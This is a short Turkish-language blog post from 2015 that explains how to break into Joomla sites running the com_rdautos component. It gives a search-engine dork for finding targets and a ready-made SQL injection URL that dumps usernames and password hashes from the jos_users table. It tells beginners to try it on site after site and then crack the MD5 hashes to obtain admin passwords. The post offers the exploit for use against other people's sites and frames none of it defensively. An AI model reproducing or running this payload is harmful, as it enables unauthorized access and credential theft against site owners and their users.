28 Şubat 2015 Cumartesi

Joomla Exploit Hack

Merhaba arkadaşlar bugün size joomla 
sitelerinde bulunabilecek bi açığı anlatıcam.

Dork: com_rdautos

site sonuna eklenecek kod:/index.php?option=com_rdautos&view=category&id=-1+union+select+concat(username,char(58),password)+ from+jos_users--&Itemid=54

yeni arkadaşlar için anlatıyorum ;
google veya yahoo gibi arama motorlarında com_rdautos olarak arattırıyoruz.

ve tek tek siteleri deniyoruz, deneyeceğimiz sitelerin sonuna ; index.php?option=com_rdautos&view=category&id=-1+union+select+concat(username,char(58),password)+ from+jos_users--&Itemid=54
ekliyoruz. ve bize md5 veriyor.
Md5i kırıp admin şifresini alıyoruz ama bazı md5 lerin kırılması o kadar da kolay değil.

0 yorum:

Yorum Gönder